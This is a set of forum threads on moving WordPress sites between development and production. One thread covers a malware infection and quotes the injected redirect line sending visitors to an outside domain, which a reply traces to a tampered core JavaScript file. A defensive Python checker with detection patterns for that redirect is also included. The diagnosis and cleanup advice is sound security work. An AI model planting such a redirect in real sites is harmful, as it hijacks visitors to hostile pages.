It seems that using the define('RELOCATE') command is a convenient tool to perform site development using a local database and webserver, then to upload into production. Otherwise, it's necessary to perform SQL REPLACE commands to update all the URLs in the posts, media and other content.
The WordPress Codex specifically states that it must be removed, but occasionally after removing, the links revert back to the dev server. Is there a reason for removal? It doesn't seem that security should be the issue, perhaps performance?
Thanks,
Jonathan
The reason you remove it is because define('RELOCATE',true); will point every visitor of your site to the admin login.
If you are still getting re-directed to the dev server then you need to re-configure your database.
I have a website that is running on an AWS server using the Bitnami Nginx and WordPress image.
https://www.athleticclubhk.com/
Recently it got all our ads on Google stopped due to malicious content. Oddly this time, it's trickier than your standard malware of infected files. When visiting the site incognito, the first and only the first link click gets redirected using the following code:
window.location.replace("https://cartoonmines.com/scount");window.location.href = "https://cartoonmines.com/scount";
This is being injected on any link, however, upon investigating the loaded code on inspect it's not injecting it into the page.
I've tried to hunt down the theme, plugins, core files and found nothing!
I replaced and reinstalled WordPress core files, deactivated all plugins and even swapped the theme - the problem is still there. I can't find any hidden .htaccess file in the entire root directory.
I even used GREP to try to look for anything fishy (any clues here that someone can help with?) nothing so far.
The site is still impacted with this so you can easily load the link ~ I do use Malwarebytes to keep myself protected, in case you are opening this directly.
Can anyone help?
The redirection code is implanted to /wp-includes/js/wp-emoji-release.min.js.
How to confirm:
Watch the cookies when clicking an internal page: a new cookie named ht_rr is being set for tracking first clicks.
Save the complete webpage locally and try to load it, then check in Chrome dev tools: you'll see that the Console tab complains about this JavaScript file attempting to set the aforementioned cookie.
While a temporary resolution of deleting the file will fix things for some time...
There's no excuse for not setting up a proper server stack. Bitnami or other "great stacks" won't cut it security-wise. They exist for "fast", but no "quality" setup, and of course, it's never going to be secure.
The file got created somehow / had write privileges. This indicates a problem with the setup most of the time. Unless you're using some nulled plugins or plugins from bad sources.
Once again, since the website was essentially "pwned", deleting the Javascript file does not mean complete disinfection. To preserve things in a secure state, I would recommend setting things on a clean server environment with strict PHP-FPM permissions aka "lockdown" chmod, and look for write errors to look for infected PHP files.
Check out some guides on the matter of secure NGINX/PHP-FPM setup:
NGINX and PHP-FPM. What my permissions should be?
Best practice secure NGINX configuration for WordPress
NGINX Security Headers, the right way
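An added example, not part of the original answer: since deleting the one JavaScript file does not show that the rest of the tree is clean, this sketch compares a WordPress directory against hashes taken from a trusted copy of the same release and flags changed, unexpected or missing files, noting the redirect call and ht_rr cookie mentioned above. The function names, the constructed sample tree and the placeholder URL are assumptions made for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Indicators named in the thread: the injected redirect and the tracking cookie.
INDICATORS = {
    "redirect call": re.compile(rb"window\.location\.(?:replace\(|href\s*=)"),
    "ht_rr cookie": re.compile(rb"\bht_rr\b"),
}

def build_manifest(root):
    """Hash every file under a trusted tree: {relative path: sha256}."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def audit(root, manifest):
    """Return {relative path: [findings]} for files that differ from the manifest."""
    root, findings = Path(root), {}
    current = build_manifest(root)
    for rel, digest in sorted(current.items()):
        if manifest.get(rel) == digest:
            continue  # byte-identical to the trusted copy
        notes = ["modified" if rel in manifest else "unexpected file"]
        data = (root / rel).read_bytes()
        notes += [name for name, rx in INDICATORS.items() if rx.search(data)]
        findings[rel] = notes
    for rel in sorted(manifest.keys() - current.keys()):
        findings[rel] = ["missing"]
    return findings

def demo():
    """Constructed sample: a clean tree, then the same tree after tampering."""
    with tempfile.TemporaryDirectory() as tmp:
        js = Path(tmp, "wp-includes/js")
        js.mkdir(parents=True)
        emoji = js / "wp-emoji-release.min.js"
        emoji.write_text("/* constructed stand-in for the core file */\n")
        manifest = build_manifest(tmp)
        # Simulate the infection described above, with a placeholder URL.
        emoji.write_text(emoji.read_text() + 'document.cookie="ht_rr=1";'
                         'window.location.replace("https://example.invalid/");\n')
        (js / "dropped.php").write_text("<?php // constructed extra file\n")
        return audit(tmp, manifest)

if __name__ == "__main__":
    print(demo())
```

In practice the manifest would be built from a fresh download of the same WordPress version and audit() run against the live document root; any file reported as modified or unexpected is a starting point for the cleanup, not proof that everything else is clean.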
Just had the same problem and it was Zend Font Plugin, the same that some people mentioned before.
Installed Wordfence and this came out. Deleted the plugin and now the site is working perfectly.
Disable plugins and check again.
Change the database username and password.
Ask the hosting manager to check the host.
I've got a copy of our wordpress instance running inside a Docker container.
Our live instance works well but inside the docker container, I do get a redirect-loop as soon as I try to get access to wp-admin.
I've disabled all plugins, I've cleared my cache and so on but nothing worked so far.
OS is debian, similar to our live system. When I get the redirect-loop, there's no information written in my apache error.log-file.
Oh and this instance is accessible by using a subdomain. I had to rewrite all "www.domain.com" to "sub.domain.com".
If I can provide you with any information to solve my problem just ask. I have absolutely no idea where to start.
Paddaels
Seems like you missed some records in the database. The best approach is to use a tool like https://interconnectit.com/products/search-and-replace-for-wordpress-databases/
If you download this free tool and upload it to your server then it does a batch find-and-replace across every single table in your WordPress database.
So, for example, replace http://www.example.com with http://sub.example.com
You can do a dry run and it will show you all the replaces that it will make. Once you're happy then click the "live run" button and all the changes are made.
I use this tool all the time when I am moving a site from my local machine to the live server. I also use the exact same approach when migrating a site from http to https
I'm in the process of setting up a development and live development environment for some basic projects I'm working on. Ideally I want git to push changes from the development server to the live site. However I want each version to use the exact same database so the posts and content are identical at all times.
Obviously the Site URL is set to only the live site so the development site's links don't work. If I overrode the site url in the wp-config.php file of each and used .gitignore to ignore both wp-config.php files would this be enough for this to work or is there something else I'm missing?
I'm posting in the hope somebody has tried it before me and that might have any answers to problems I encounter now or in the future.
Thanks in advance, Ollie
Make sure you add the .gitignore entry before changing and committing the wp-config.php.
Once you update wp-config.php, it's going to go through and update URLs in the database. Since WordPress is stateless - to say there is no session management, there is no way of tracking if a database has been swapped.
Lastly, WordPress uses a MySQL database, which wouldn't be versioned unless you went through a lot of work to do so. Aside from wp-config.php, there aren't any other stored references of what the site's URLs should be.
I have a live site built in WordPress at www.site.com/name1.
The client wants a new theme. I've heavily modified the current theme with custom code and will need to do so with the new theme, all without interrupting the live site, so this won't be as simple as moving the site from one theme to another. Therefore I think I need to create a duplicate of the site at www.site.com/name2 because the content will all be the same. Doing this will give me a place to work on the redesign.
What is the best way to go about doing this? Should I have both use the same DB or not? When I get ready to go live should I simply redirect the domain to /name2 or move everything at /name2 to /name1?
Any help is appreciated.
Thanks,
Chris
If you want the same data you can use the same DB, but there are some Options tables and Meta tables in the WordPress DB, so if you change parameters on one site it will affect the other.
If you just recode the theme without touching anything in the configuration you can use the same DB to test your theme with valid data, but if you think you'll have to change parameters I would prefer to duplicate the production DB to a test DB to secure the production website.
When you go live you'll just have to move your theme to the production website and copy your Option and Meta Tables.
If you're at a point where you're having clients, you should definitely develop locally. This will free you from the trouble of mistakenly messing up the production site.
Install Apache, MySQL and PHP on your own machine.
Copy database and files from production.
Change anything you'd like without exposing it to the Internet.
Upload your new, tailor-suited theme to production when it's ready to go live.
I've made a local version of my company's live website. My problem is that none of the links work and I can't sign into the admin control panel. I think it has something to do with the clean-urls module. Any ideas? The error I'm getting is url request was not found on this server.
If you made a full copy including the database, you must clear all caches, e.g. directly in the database, or using the Devel-Module. If no other settings have changed in the .htaccess, and there is no fixed url given in the settings.php (the $base_url), it should work.